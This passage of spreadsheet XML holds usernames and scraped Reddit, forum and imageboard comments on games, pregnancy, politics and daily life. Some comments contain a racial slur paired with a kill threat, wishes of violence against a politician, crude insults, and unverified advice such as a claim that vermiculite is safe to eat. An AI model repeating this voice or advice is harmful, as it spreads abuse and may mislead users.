    <t>Smart, knowledgeable, future-looking people were trying to educate and inform dumb, shortsighted people. The latter prevailed because they muddied everything and refused to get their heads out of their asses. And they're getting shittier transit that serves them terribly. Oh well.</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>The sheet says “85% Ethanol” and the other items are the compounds that make up ‘gasoline’. Good to go in flex fuel engines.</t>
  </si>
  <si>
    <t>skylord_luke</t>
  </si>
  <si>
    <t>WE NEED: ..not loosing levels on **FIRST** death,each death maybe taking 2 levels instead of **ALL** .. **Remove stamina** for zombies,zombies dont get tired,its just annoying .. it takes too long to kill a player now,im a zombie,im in your face.. it shouldnt take more than 2 hits... a normal infantry can kill eachother faster by fists.. its hillarious</t>
  </si>
  <si>
    <t>mupawa</t>
  </si>
  <si>
    <t>I've been playing since beta, but the game has actually degraded over time. It used to be there were places you could go to farm legendaries without an event. Not anymore. Whitesprings and Robco and other places are empty - because there is no reason to go there. They tinkered with the events when they added public events, or it may have even been before that but now uranium fever and one violent night are rare. For the last 2-3 weeks I server hop looking for something to do but it has really become boring. Players I relied on to keep the nukes flying are no longer playing (vampirex for example) probably because what appears to be a concerted effort by Bethesda to make the game boring. No one does vault 94. No one plays project paradise. Most events do not award legendaries so are of no interest to players level 100+. The kicker was the announcement yesterday. I've been waiting for Wastelanders to save the game. Instead they are going to let you pay to host a server. If that server is governed by the same boring rules I see no appeal at all. And they are going to add game effecting things to the atomic shop. Wastelanders will be in Q1. Pretty sure there will be no one playing at all by then. The game is dead.</t>
  </si>
  <si>
    <t>Dayton Veto</t>
  </si>
  <si>
    <t>Discounted only</t>
  </si>
  <si>
    <t>Ltfocus</t>
  </si>
  <si>
    <t>Arnt the police seen throwing Molotov? Correct me if wrong</t>
  </si>
  <si>
    <t>MFJandS</t>
  </si>
  <si>
    <t>Paperclip and spit</t>
  </si>
  <si>
    <t>marc1401</t>
  </si>
  <si>
    <t>vassy1 11 m ago With just 3 reviews??? Yes. Strangely the red version has close to 4 stars from 5 reviews lol Acoustic Solutions DAB Radio - Redby Acoustic solutions 572/8208</t>
  </si>
  <si>
    <t>CFBHurts</t>
  </si>
  <si>
    <t>Jeweled Shillelagh 3-peat makes for a very happy ND ball.</t>
  </si>
  <si>
    <t>vaz93</t>
  </si>
  <si>
    <t>Hello, I need automatic IGTV views to resell. I can only find regular IGTV views but not automatic. If anybody can provide this service with automatic detection and instant delivery, please PM. Thanks!</t>
  </si>
  <si>
    <t>jackbmerton</t>
  </si>
  <si>
    <t>I'd be very surprised to see Coldplay headline again after only playing it a few years ago. I'm sure Chris Martin will manage to pop up somewhere in some form but I can't see them headlining this time round.</t>
  </si>
  <si>
    <t>mouseinthecorner</t>
  </si>
  <si>
    <t>Thank you! I'll check both of those out. I appreciate it.</t>
  </si>
  <si>
    <t>SabrinaAngel</t>
  </si>
  <si>
    <t>Ok so update I tested on 12 and 13 dpo I got both BFN. My AF (Aunt Flo - menstruation/period) was due yesterday and today I'm 15 dpo so I decided to test I got a BFP. But my husband still cannot believe it he thinks the test is a false. I've heard the digital test are more accurate than the dyes but now I'm having second thoughts. Has anyone had a false digital test before?</t>
  </si>
  <si>
    <t>honeysidemanor</t>
  </si>
  <si>
    <t>Meant to live is an all time classic</t>
  </si>
  <si>
    <t>Jkins20</t>
  </si>
  <si>
    <t>He held off for the same reason every other administration official held off, they’re cowards. The sooner we dispel with the myth that these are wise admirable people just put in a tough spot and doing all they could do, the better off our country will be. He’s a coward. Fuck Jim Mattis.</t>
  </si>
  <si>
    <t>&gt;&gt;480198308 &gt;I want a cute artsy hipster gf now. The worst trash female you could choose. At least a thot could have sex with you. But what you want finds sex to be obsolete and not artistic enough.</t>
  </si>
  <si>
    <t>TeethOnTheCob</t>
  </si>
  <si>
    <t>That's now how it works anymore that's a pretty old quote. You specifically can't stack handcannon reloader or targeting mods. They mention it in the armor 2.0 stream.</t>
  </si>
  <si>
    <t>Sugarcookie00</t>
  </si>
  <si>
    <t>I wanna give a gentle YTA. You aren’t purposely being TA, I think it is just more to do with lack of self awareness. I mean the other women seem kind to you about it and tolerate when you talk about it, but comparing a dog to children is kind of rude, whether you realize it or not. Gemma probably said what she said because you probably do this behavior frequently. So she was probably confused, and Lena who has been there longer probably tried to give her an explanation (albeit not in the nicest way), it’s probably what she infers from the frequency you do this behavior. They probably assume you see your dog as a baby or child because of how much you do this, whether you actually believe that or not. They’re also probably very low on free time and all they probably have going on is work and parenting and bond over that. They probably see you are trying to bond with them too but aside from working with them don’t have much in common due to very different lifestyles which is ok. I’d recommend making friends outside of work with more similar interests to you, maybe ones who enjoy dogs or activities as much as you do. Honestly I don’t see you being able to work out a bond with these women the way they are with each other which can feel really sucky but it’s ok! It just means you’re at different stages of your lives and have different lifestyles.</t>
  </si>
  <si>
    <t>Entercheesynamehere</t>
  </si>
  <si>
    <t>I’m smart for a baby. So I’d manipulate my parents.</t>
  </si>
  <si>
    <t>JerseyGrl4life</t>
  </si>
  <si>
    <t>Handsome happy baby.</t>
  </si>
  <si>
    <t>&gt;&gt;73021025 Gaming at 4k is a meme and flat panels are snake oil</t>
  </si>
  <si>
    <t>Zonetr00per</t>
  </si>
  <si>
    <t>Hi, /u/ElCiroscopio420, Unfortunately, we have had to remove [your submission](https://www.reddit.com/r/worldbuilding/comments/dfr050/-/) in /r/worldbuilding because it violated one of our rules. In particular: Posts must include worldbuilding-relevant context *on the reddit post* (as a comment, in the text of the post or, in some cases, in the posted image itself). This is important to establish that your post is on-topic and to help encourage productive discussion. * If your post is about your world, it has enough context when a person unfamiliar with your world could understand what you're talking about and ask informed questions about it. This could include a summary of your world, explanation about what your post depicts and how it fits in your world, etc. ("What's a [proper noun]?" usually doesn't qualify.) * If your post is about something you think is useful to worldbuilders (inspiration, articles, and so on), it has enough context when a person unfamiliar with the subject could understand what you're talking about and why the item is relevant to worldbuilding. ("I found this inspirational" doesn't qualify. Talk about possibilities, or how it was useful to you, or what you think about it.) More info in our rules: [2. All posts should include original, worldbuilding-related context.](https://www.reddit.com/r/worldbuilding/wiki/rules#wiki_2._all_posts_should_include_original.2C_worldbuilding-related_context.) ***** Images and maps must include worldbuilding-relevant context *on the reddit post* (as a comment, in the text of the post or, in some cases, in the posted image itself—e.g. infographics). This is important to establish that your post is on-topic and to help encourage productive discussion. * A post has enough context when a person unfamiliar with your world could understand what you're talking about and ask informed questions about it. This could include a summary of your world, explanation about what your post depicts and how it fits in your world, etc. ("What's a [proper noun]?" usually doesn't qualify.) * For maps, you could discuss economic and political situations, the different cultures, or anything else that gives the reader a wider view of your world than just its geography. * Discussion of the artistic process or techniques used to create the map or image may be included, but does not count as “worldbuilding-relevant” on its own. Infographics that self-contain sufficient context to be understood do not require additional context. More info in our rules: [2. All posts should include original, worldbuilding-related context.](https://www.reddit.com/r/worldbuilding/wiki/rules#wiki_2._all_posts_should_include_original.2C_worldbuilding-related_context.) ***** **You may repost** with the above issue(s) fixed to satisfy our rules. If you're not sure how to do this, please send us a modmail (link below). This is **not** a warning, and you remain in good standing with /r/worldbuilding. ***** Please feel free to [re-read our rules](https://www.reddit.com/r/worldbuilding/wiki/rules). Questions or concerns? You can [modmail us here](https://www\.reddit\.com/message/compose?to=%2Fr%2Fworldbuilding⊂ject=about my removed submission&amp;message=I'm writing to you about the following submission: https://www.reddit.com/r/worldbuilding/comments/dfr050/-/. %0D%0D[Fill in your message here. Please make sure to explain clearly!]) and we'll be glad to help. Please explain your case clearly. Be polite. We'll do our best to help. *Do not* reply by comment or personal PMs to moderators.</t>
  </si>
  <si>
    <t>Yupp. Been bad since about 25 weeks but babe dropped in the past few days and it’s a million times worse now. Everything hurts. We were grocery shopping today, and with every step, I felt my pelvis pop. 37+4 today</t>
  </si>
  <si>
    <t>yogi89</t>
  </si>
  <si>
    <t>&gt; If this were any other presidency, he would've given up his tax returns like 3 years ago</t>
  </si>
  <si>
    <t>TeslaEDM303</t>
  </si>
  <si>
    <t>Help Edmonton, I'm hosting a party tomorrow! And I need to find the best Champagne Flutes around. I want them to be nice and elegant...where to buy ?</t>
  </si>
  <si>
    <t>Killself98</t>
  </si>
  <si>
    <t>dont see the problem here, next your gonna tell me that getting milk from the back of a cow is strange.</t>
  </si>
  <si>
    <t>123Yuriy</t>
  </si>
  <si>
    <t>Hey guys it's been 11 months since I submitted my background packet and in October my background detective called me I have 6 speeding tickets and one red light violation he said this is a great possibility of you being disqualified after two days my status says this background incomplete, status withheld , reason BI FAIL ,I'm sure this means I'm disqualified can you confirm this please.</t>
  </si>
  <si>
    <t>lulu442</t>
  </si>
  <si>
    <t>this 100%! That’s why you hear about it. And yes you hear about it a lot because it is very common because 1 in 4 pregnancies is very common. There are people in your life who probably had them who you didn’t even know had miscarriages. I have a healthy 20 month old but I had two miscarriages after. I didn’t have any complications with my first at all so the miscarriages came as a total shock. I didn’t have the first one until I was 9 weeks not one sign before started at 9 and got heavy at 10 weeks. Sometimes it just feels like luck of the draw. Just be positive and hope for the best.</t>
  </si>
  <si>
    <t>MechaPyx</t>
  </si>
  <si>
    <t>Time to get our nukes out of Turkey. Just in case. But of course Trump won't and then we'll end up losing them and Trump will roll over for that too like the spineless coward traitor that he is.</t>
  </si>
  <si>
    <t>oxygen_problems</t>
  </si>
  <si>
    <t>Complete the challenge, and an older man driving a mercedes will come and steal your girlfriend.</t>
  </si>
  <si>
    <t>hermitpez</t>
  </si>
  <si>
    <t>Pride should be reserved for something you achieve, not the geographical location that your mum squeezed you out into.</t>
  </si>
  <si>
    <t>SuperNahta</t>
  </si>
  <si>
    <t>By this logic just about everybody in government positions are “unelected”. It’s a ridiculous and purposely pedantic and disingenuous way of looking at it. Again though , like I said in my other comment to someone else, it is done this way to appease eurosceptic nations like the UK. If there was a European wide election to select a commission president then a majority of Europe could overrule the minority. So 90% of Europe could vote for somebody while the UK would vote 90% for somebody else. The UK would then complain that he has no mandate. It would make the European Parliament and it’s institutions sovereign over nations. Now that the UK is leaving the EU we will probably see an even more democratic system installed as the the biggest eurosceptic nation will not be able to stop it.</t>
  </si>
  <si>
    <t>D_Greene</t>
  </si>
  <si>
    <t>My neighbors are 3 generations of family living on the second floor of a 3 story condo. Sometimes it sounds like someone is walking around in power armor above us. We aren't too bothered by that, but the rapid thumping from children running is really obnoxious. One day I decided to go up and politely ask if they could let their kids play outside instead of running around since the noise was very distracting. Upon walking over to the exterior apartment, I caught at least half the family leaving (kids, mom, grandma). I foolishly still went with it, and asked if they could prevent their kids from running inside, and maybe take them out. Protip, give praise in public, and criticism or reprimand in private. Otherwise people might get defensive. The mom basically told me to fuck off with a "how dare you" equivalent tossed in. Since then after 11pm we just call the cops for noise complaints, 3 in one night for what sounded like domestic violence. We even have a AC drain issue since all 3 units AC drain are connected, so we suffer if they don't maintain their AC drain lines. I've circumvented them entirely and went to the third floor to see if I could help them help all of us by pouring bleach in their drain line, and teaching them how and why. They were super chill, super cool, and we've had a great relationship since (I helped them with their car once).</t>
  </si>
  <si>
    <t>NeoVeci</t>
  </si>
  <si>
    <t>Are you saying since he’s dead he’s past terminal?</t>
  </si>
  <si>
    <t>Adamthenormalguy</t>
  </si>
  <si>
    <t>Thank you for elaborating on this. I will edit the list accordingly.</t>
  </si>
  <si>
    <t>Rogue-Journalist</t>
  </si>
  <si>
    <t>Trump mischaracterizes a photo of the Bidens playing golf</t>
  </si>
  <si>
    <t>DLPyromania</t>
  </si>
  <si>
    <t>The intro to the Ecco The Dolphin HD Remaster looks sick!</t>
  </si>
  <si>
    <t>mysticbooka</t>
  </si>
  <si>
    <t>That's how i feel for Tool. I used to listen to their music back in high school all the time but now if I hear a song of theirs i'm just like "ugh so boring" haha</t>
  </si>
  <si>
    <t>tootie</t>
  </si>
  <si>
    <t>We didn't know who Deep Throat was for like 40 years. Makes no difference.</t>
  </si>
  <si>
    <t>larslibslayer</t>
  </si>
  <si>
    <t>veale728 : BrerRobot: veale728: The Rancho Cucamonga Police Department received a Suspicious Activity Report (SAR) from Google reference a subject who had been posting numerous threats online against law enforcement in Rancho Cucamonga. So, odds are good someone reported a post or twelve to someone on a Google-owned forum, and they responded by contacting law enforcement. Would you rather Google not contact the cops when someone says "I want to kill cops"? that's fine, but the concern is if the cops are going to show up at someone's house just for expressing the hope and wish that terrorists bomb the fark out of every foreign Trump tower or that someone just shoots him in the face.Not something any of us here could do, or would do, I don't have the capacity to do such a thing, but i'd like the freedom to express hopes for bad things to happen to him without getting questioned by the cops. Except this guy didn't just say "I hope some cops get killed", he said some variant of "I want to kill cops". And texted threats to 911 as well. Maybe he was hoping for suicide by cop or something. Right, my bad. Texting threats to 911. That's not smart.</t>
  </si>
  <si>
    <t>KeefBlurry</t>
  </si>
  <si>
    <t>Networking with good positive people, strong effort and hard work pays off well. Having all this and good grades will take you to the next level but without the summa cum laude transcript, you can still be successful.</t>
  </si>
  <si>
    <t>Your [submission](https://www.reddit.com/r/apexlegends/comments/del1uu/looking_for_new_players/) in /r/apexlegends was automatically removed due to it being a looking for group or clan recruiting post. Please use our [Public Discord](https://discord.gg/apexlegends) to look for people to play with. If you would like better clarification or need further assistance, please message the moderators with a link to your post. Failure to include a link to your post will result in the modmail being ignored. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/apexlegends) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>miarella</t>
  </si>
  <si>
    <t>There are plenty of women that presents more masculine and still identity as woman, You could be non binary the only way to find that out is to experiment. What do you miss from that a cute boy would have?</t>
  </si>
  <si>
    <t>Feefo.com</t>
  </si>
  <si>
    <t>Never wait long for delivery! Never had any problems at all. Looks good! It is a Christmas present! As a present for someone cannot say, but looks ionteresting Bought as a present, looks good and trusted source Bought two sets again as well as this time and thought they were brilliant, Bought as presents for chaps</t>
  </si>
  <si>
    <t>dirtygymsock</t>
  </si>
  <si>
    <t>It's going to be difficult, that's for sure. It's a very technical case and 99% of the equipment used by the perpetrator and referenced by the investigation is obsolete and probably doesnt exist anymore. A case study of the why rather than the who may be more fruitful... though it's going to be mostly speculation at best. I tend to think that most complex crime is partially driven just by the simple perception that the perpetrator(s) can get away with it. I mean, we've all played the 'how would I rob a bank' game in our head. I think for some people, like a narcissist, if you do that enough and think you can get away with it, it's a much easier step to actually put it in motion where you average person could never actually make a move on it.</t>
  </si>
  <si>
    <t>lineaway</t>
  </si>
  <si>
    <t>products until I started back to riding trials and my bikes ran terrible. About that time we were working on RM 80`s ridden by Ivan Tedesco and the Johnson`s. We switched to Maxima Super M and the engines were super clean inside. I have run Super M ever since. My two cents are until you have torn an engine down, you really have no clue about what that trick oil is doing to your insides. Kinda like you are what you eat. I obviously am made of hops and barley.</t>
  </si>
  <si>
    <t>BombBloke</t>
  </si>
  <si>
    <t>&gt; Also I think the Iga's backpack DLC isn't available yet but that might've been a separate issue. It's supposed to be included alongside the Xbox 1.006 Update. https://www.kickstarter.com/projects/iga/bloodstained-ritual-of-the-night/posts/2629717 &gt;This update is still planned to go live by the end of September. It will contain: &gt; &gt;* IGA’s Backpack DLC &gt;* Balance Update #1: Details Here &gt;* Overlord achievement fix &gt;* HDR Fix &gt;* Localization improvements &gt;* XB1-specific bug fixed</t>
  </si>
  <si>
    <t>TheMan_Aman</t>
  </si>
  <si>
    <t>PineappleJ 02/10/2019 09:45 Its a bit of an off one as you can run it on a reasonably low end system … Its a bit of an off one as you can run it on a reasonably low end system with low settings but as you ramp up thr various settings, resolution and use add ons you need a much beefier system. With all settings maxed and addons i think achieving 30-40fps would be a challenge with a 2080ti and 3900x! So something for everyone Read less Read more Apparently one of the YouTubers who was invited to play the pre alpha version said the computers were running RTX cards, didn't mention which ones. I'll link the video if I can find it</t>
  </si>
  <si>
    <t>shitfacts</t>
  </si>
  <si>
    <t>Pretty much everything he said in that clip was factually inaccurate.</t>
  </si>
  <si>
    <t>Simple27</t>
  </si>
  <si>
    <t>Magnitude 3.5 Region JUJUY, ARGENTINA Date time 2019-10-06 06:07:33.0 UTC Location 23.35 S ; 66.96 W Depth 221 km [link to m.emsc.eu (secure)]</t>
  </si>
  <si>
    <t>&gt;&gt;15758978 Infact it may shoot less powerfully depending on the propellant and exact barrel length.</t>
  </si>
  <si>
    <t>Vohnja</t>
  </si>
  <si>
    <t>Really well put my guy. That's a bloody complicated question, and there's no simple answer. That's a deeper level of analysis than expected, ey?</t>
  </si>
  <si>
    <t>&gt;&gt;21482838 I cant find a good manual tacoma or ranger that isnt beat up to shit. I've been driving my shitbox crx for 8 months now and I just find shifting so fun.</t>
  </si>
  <si>
    <t>Hetellin</t>
  </si>
  <si>
    <t>Camera angle, I think.</t>
  </si>
  <si>
    <t>svangen1_</t>
  </si>
  <si>
    <t>Yeah they do. Especially with gays. You have the gays who like hairy or bigger guys like Chris Pratt, you have the gays you like twinks like Tom Holland, you have the gays that like femme guys like Jeffree Star or James Charles, etc</t>
  </si>
  <si>
    <t>Fughettaboutit</t>
  </si>
  <si>
    <t>Oh 100%. And honestly after getting my ear rubbed and feeling that unbelievably soothing sensation, i know pet me pets ears so they know whats up</t>
  </si>
  <si>
    <t>Mtfthrowaway112</t>
  </si>
  <si>
    <t>Communion on the tongue was the universal norm for centuries up until very recently. I started to take communion on the tongue as a way to recognize that this is a most holy thing and that the priest has had his hands consecrated for the sacraments. My hands have not. I also will use this to remind myself that I need to be fed by God, that I can't do it myself. So for me it's an of humility and make sure I remember what I am doing when I take communion.</t>
  </si>
  <si>
    <t>dtotzz</t>
  </si>
  <si>
    <t>That looks great! Would be a nice thing to add someday - curious to see how they’ll compare to the upcoming Ikea smart blinds. Hopefully all the competition in this space will drive prices down since the tech isn’t very complicated.</t>
  </si>
  <si>
    <t>AleoItiari</t>
  </si>
  <si>
    <t>Wow thank you so much for the clarification and help DClawdude! I really appreciate it! I will be looking into all these links and use the calculator! Thank you again!</t>
  </si>
  <si>
    <t>Clevelandlandlord</t>
  </si>
  <si>
    <t>Thank God I live in low cost of living state. 3000 square feet at the price of a 1bedroom condo in NYC.</t>
  </si>
  <si>
    <t>LightVader</t>
  </si>
  <si>
    <t>ubisoft logic of peace</t>
  </si>
  <si>
    <t>5minmajor</t>
  </si>
  <si>
    <t>I'm always worried about Russian talent that doesn't get what they want and get pissy. I'm worried they'll return to the KHL and never come back.</t>
  </si>
  <si>
    <t>Regginerabmud</t>
  </si>
  <si>
    <t>&gt;they will be moving Syrian Arabs and Turkmen into historically Kurdish towns and villages. So like africans/middle eastern people are being moved to historically european towns and villages?</t>
  </si>
  <si>
    <t>plaidflamingo</t>
  </si>
  <si>
    <t>My heart rate is at its lowest with Maple Maddux on the mound.</t>
  </si>
  <si>
    <t>Filo1409</t>
  </si>
  <si>
    <t>There is something wrong with that. You should always only support one team and that should be the one you first became a fan of</t>
  </si>
  <si>
    <t>Ange1Wings14</t>
  </si>
  <si>
    <t>I agree it makes saving up more of a purpose rather than waiting for the next dlc. And I have been wanting to get one for diamond shopping and crates but I always miss the sale. Instead I use a deluxo, didn’t miss that sale lmoa.</t>
  </si>
  <si>
    <t>&gt;&gt;15696034 Apparently not anymore and she's back to using she again. Mad shit, eh?</t>
  </si>
  <si>
    <t>Foodxfoodph</t>
  </si>
  <si>
    <t>One of the best Hentai animation in its year. It was a legendary hentai indeed. Lolsz</t>
  </si>
  <si>
    <t>trebla193</t>
  </si>
  <si>
    <t>Quote: : Quote: : M Sport? XLine, from what he listed it as. That's one of the only options it didn't have, it has the B and O system as well.</t>
  </si>
  <si>
    <t>Shaikh04</t>
  </si>
  <si>
    <t>Shaikh04 , Oct 4, 2019 at 11:35 AM : currently I'm using OnePlus 7 pro and im Unable to hear other person over call or very less volume while I'm connected to Airpod 2. Am I the only one who is facing this issue? any suggestions/ Help?</t>
  </si>
  <si>
    <t>glumseahorse</t>
  </si>
  <si>
    <t>I can’t tell what is before or after</t>
  </si>
  <si>
    <t>siciapspqnfis</t>
  </si>
  <si>
    <t>YGOPro, Dueling Book and Nexus are all good. So much has changed that it's hard to explain in one post, but I'd be happy to chat/play and answer questions if you'd be down :)</t>
  </si>
  <si>
    <t>&gt;&gt;8004649 I swear to god ill kill this nigga irl</t>
  </si>
  <si>
    <t>Darkpickbone</t>
  </si>
  <si>
    <t>Alice Munro is a fantastic short story writer and I highly recommend any of her collections, though I have only read *Runaway* and *Hateship, Friendship, Loveship, Courtship, Marriage*. Flannery O'Connor's *A Good Man is Hard to Find* is also really good. Vonnegut wrote soem great short stories too if that's helpful.</t>
  </si>
  <si>
    <t>nated0ge</t>
  </si>
  <si>
    <t>Took me like 20 seconds to realise the second word wasn't "OISW."</t>
  </si>
  <si>
    <t>pole_fan</t>
  </si>
  <si>
    <t>iirc it came up when BB said that LT was the best player he ever played with</t>
  </si>
  <si>
    <t>iWarnock</t>
  </si>
  <si>
    <t>Yo, i got this bridge you might want to check out</t>
  </si>
  <si>
    <t>nuron5230</t>
  </si>
  <si>
    <t>The attritional, grinding cricket we saw in this match stands out in contrast to the recent matches where 300-350 runs became a match-winning score aided by bowler-friendly wickets where something happens every over to keep your interest up. Slow surface, low bounce, no lateral movement for fast bowlers, spinners not getting much zip of the surface meant every wicket taken by bowlers was hard-earned akin to extracting oil from dry sand. It makes for uncomfortable, frustrating viewing where you somehow just want the opposition batsman to get out but if a wicket does fall even a passive viewer like myself feels like he has earned the wicket and shares the same relief or ecstasy the bowler feels.</t>
  </si>
  <si>
    <t>Juliet316</t>
  </si>
  <si>
    <t>DarthMane2 said: ↑ Lex Luthor Movie in dev with him being President Sent from my iPad using Tapatalk Click to expand... So basically adapting the OMAC storyline from the comics (Luthor was President during much of that storyline)</t>
  </si>
  <si>
    <t>BaronKlatz</t>
  </si>
  <si>
    <t>Twilight Link would just have it bend down so he can pet it and then ride it. Think smarter, not work harder BotW Link! Awesome artwork, btw. :D</t>
  </si>
  <si>
    <t>Weldeer</t>
  </si>
  <si>
    <t>[decided to try it on my GF, in a different variation](http://imgur.com/a/WacCWrY)</t>
  </si>
  <si>
    <t>Hanno54</t>
  </si>
  <si>
    <t>I thought he was already scheduled to leave?</t>
  </si>
  <si>
    <t>branyeet</t>
  </si>
  <si>
    <t>I mean we seriously can’t lose against Galatasaray especially after PSG and Club Brugge. We should play Rodrygo or Brahim instead of Vinicius at the right</t>
  </si>
  <si>
    <t>HandSack135</t>
  </si>
  <si>
    <t>And you lost your balls to Trump.</t>
  </si>
  <si>
    <t>Misanthrope-X</t>
  </si>
  <si>
    <t>Thats not true. Custom horde lobbies award full xp, rewards and challenge/medal progression.</t>
  </si>
  <si>
    <t>LoL-Shadikar</t>
  </si>
  <si>
    <t>I played so much Zoe yesterday! She's a blast but took some getting used to. One game she actually got first picked away from me by the other team so I went Ahri and crushed her dreams. Zoe is a lot harder to play than Ahri. Nothing is as straight forward as just throwing a skill shot out, your Q can actually be blocked my minions, and you can't use your R as an escape. She's definitely worth picking up though if you're into that.</t>
  </si>
  <si>
    <t>Kenji_03</t>
  </si>
  <si>
    <t>1: "God damn you are boy band handsome". 2: My dad was (and arguably still is) quite emotionally distant from me as well. I got through it and I am sure you will too (I'm 33 now). 3: Friends come and go, it's okay to not have many or any of them at 17. As you create your identity over time, more and more people will want to spend time with you. if you want help in figuring out who you are or who you want to be, well... that's what we're here for :P</t>
  </si>
  <si>
    <t>Clicks4Cote</t>
  </si>
  <si>
    <t>This little spot called Los Angeles is a neat little space</t>
  </si>
  <si>
    <t>liminalmornings</t>
  </si>
  <si>
    <t>Really? What exactly does it do?</t>
  </si>
  <si>
    <t>&gt;&gt;13607733 &gt;implying we will live to +35 I can now be eventually maybe 27 and still get a cute 18yo bf because I will look young.</t>
  </si>
  <si>
    <t>SuitableRock</t>
  </si>
  <si>
    <t>Exactly, it's a lifestyle I enjoy :)</t>
  </si>
  <si>
    <t>vohuynhminhtan</t>
  </si>
  <si>
    <t>Haha, I can't believe some replaced parts can be better than the original one</t>
  </si>
  <si>
    <t>ValhallaChaos</t>
  </si>
  <si>
    <t>One: OP is female. Two: how is this a bug? They could've hot jumped and they'd be back in the lobby within 30 seconds queuing up for another game but they didn't. This "bug" is most likely not going to happen to me because I don't rage quit, I always wait til my my banner times out before I leave. But apparently it's so difficult for a lot of people. And yeah, I've been put in a 'team' by myself-do you know what I do then? I hot jump and most of the time am back in the lobby within 30-45 seconds.</t>
  </si>
  <si>
    <t>EianSiCK</t>
  </si>
  <si>
    <t>A lot of civilians don't understand the nature of sex work and the very very specific boundaries that come with it. It sounds like just ignorance on his part. I'm sure the logic is, "I'll spend time on this and then get paid for my time if it works" which would be reasonable if this wasn't sex work and there weren't very specific power dynamics to consider. Try explaining to him that it's gross to you and tell him why. If he gets weird about it, then maybe question the relationship. But be honest with him about the implications of what he's asking. If you need help from him, maybe you could offer to pay him a one time finders fee as opposed to "a cut." That way, you're hiring him for a service as opposed to something far more gross. He can't skim your paycheck for doing one thing for you. That's bordering on pimping and is super fuckin skeezy.</t>
  </si>
  <si>
    <t>VanCity_Livin</t>
  </si>
  <si>
    <t>I use my Instagram for picture and videos for the process of creation :) “vancity_livin”</t>
  </si>
  <si>
    <t>JonnyRichter</t>
  </si>
  <si>
    <t>Never had any hate for the Browns. I looked at this win as us proving ourselves and it affected my opinion of the browns no differently than when you spanked us 4 years ago. GG Cleveland.</t>
  </si>
  <si>
    <t>maroonedbuccaneer</t>
  </si>
  <si>
    <t>It's the origin of Humanism. You can dismiss it if you want, but without those Renaissance Humanists there would be no modernity and no modern humanism.</t>
  </si>
  <si>
    <t>tucketnucket</t>
  </si>
  <si>
    <t>What kind of cleaning supplies would you recommend? Inside and out. Are there any particular brands that are better than others? Looking for soaps, glass cleaner, leather cleaner, and wax. Thanks!</t>
  </si>
  <si>
    <t>SwimsInATrashCan</t>
  </si>
  <si>
    <t>Right, and in the usage you're using, "their" is not the correct word. "**They're** (they are) going to **their** (possessive) movie theater, which is over **there** (location)." Or in your sentence: "I've been **there** before with afternoon shows. Almost no one **there** and cheaper too!!"</t>
  </si>
  <si>
    <t>DoxandOdie</t>
  </si>
  <si>
    <t>Vermiculite wont harm you if u eat it. It just isnt aestheticly pleasing to the eye. No need to cut off any part of the mush to get rid of. Gobble em up!</t>
  </si>
  <si>
    <t>I take it as a red flag and an attempt to gas my head up or lovebomb me so he can manipulate me later on.</t>
  </si>
  <si>
    <t>Rev06</t>
  </si>
  <si>
    <t>Quote: : My Glocks are Polymer80s so no problems either. Lol! w indulgence of OP (sorry Prob should open a new thread) but Kernel looking at the P80 route for 1 or 2 as well any recommendation for the easiest jig and best price etc? I am willing to pay up for easier better .</t>
  </si>
  <si>
    <t>cyberjellyfish</t>
  </si>
  <si>
    <t>Paper. It's renewable, compostable, and will decompose on it's own. Plastic is none of those.</t>
  </si>
  <si>
    <t>hughesyy</t>
  </si>
  <si>
    <t>10 Team Standard. Huge matchup this week and I need the W. But I am stuck choosing between 3 RBs with Mack on bye. Help me out! Choose two: Tevin Coleman @ LAR Malcolm Brown vs 49ers Joe Mixon @ Baltimore</t>
  </si>
  <si>
    <t>Cbs2oo2</t>
  </si>
  <si>
    <t>This summer I worked at a family camp as a counselor... this is the video I made about my experiences</t>
  </si>
  <si>
    <t>rafael-a</t>
  </si>
  <si>
    <t>The fuck?</t>
  </si>
  <si>
    <t>TradeChameleon</t>
  </si>
  <si>
    <t>No, you aren't wrong. But if she's that dependent on you, why isn't she in therapy to fix it? You had to have known it wasn't healthy. I'm not blaming you, she's an adult too, but she might not be able to see the depndency clearly or think its a problem</t>
  </si>
  <si>
    <t>garbageeater</t>
  </si>
  <si>
    <t>I'm afraid to check my fantasy score after that missed FG</t>
  </si>
  <si>
    <t>Twickenpork</t>
  </si>
  <si>
    <t>&gt; I don't think they actually drive around the warszone brandishing huge cocks of silent death. r/BrandNewSentence</t>
  </si>
  <si>
    <t>ricosalsa</t>
  </si>
  <si>
    <t>I was gonna pull mine out but you tipped your hand.... Phew</t>
  </si>
  <si>
    <t>bitter--coffee</t>
  </si>
  <si>
    <t>Prompt : Winter Preparation Character belongs to Image size 1157x1614px 2.52 MB</t>
  </si>
  <si>
    <t>RedGorilla33</t>
  </si>
  <si>
    <t>If the girl is a little heavier she would be dead.</t>
  </si>
  <si>
    <t>UpChop4Chase</t>
  </si>
  <si>
    <t>Yes and no. With so much grip there is actually less overall competition and more room for error.</t>
  </si>
  <si>
    <t>StaffmeisterK</t>
  </si>
  <si>
    <t>I got an 84 Matt Ryan form the blitz event yesterday, no elite from the badge set yet though</t>
  </si>
  <si>
    <t>lvmensch</t>
  </si>
  <si>
    <t>Quote: Originally Posted by .sparrow. I worked in a shoe store when I was young, and I always wondered why tall women wore such tall heels. Their feet are usually larger so the taller the heel the smaller the foot looks because it elongates the foot making it look like an extension of the leg. I mean, this is just what I was told so take it with a grain of salt. lol. I think it mainly optical. Tall ladies often have long lags and bigger feet. So the overall effect of heels is much stronger. Even if the heels are relatively lower. And they may not be. I watched my daughters go all through that and was always amazed that hey could and would walk in those things. I would personally have been scared to death to ever try to walk in such things. And I have even seen my daughters run in them. Mind blowing.</t>
  </si>
  <si>
    <t>Rainingoblivion</t>
  </si>
  <si>
    <t>You should also play that music you think others might not like because you can open people up to other bands or genres they never would have listened to. That’s how I got my friends into things like Billy Talent, and MeWithoutYou .</t>
  </si>
  <si>
    <t>davidpmv</t>
  </si>
  <si>
    <t>Thanks for the guide, i started uninstalling the updates. Changing from full screem to borderless in the settings like said in the comment below fixed the problem for me. I have been playing all weekend and the big did not present itself.</t>
  </si>
  <si>
    <t>broken_symlink</t>
  </si>
  <si>
    <t>Have a buzzon element x and yyj matrix myself.</t>
  </si>
  <si>
    <t>Incognito_Mermaid</t>
  </si>
  <si>
    <t>Oh no, I read The Predator today, I didn’t need this</t>
  </si>
  <si>
    <t>dxmm316</t>
  </si>
  <si>
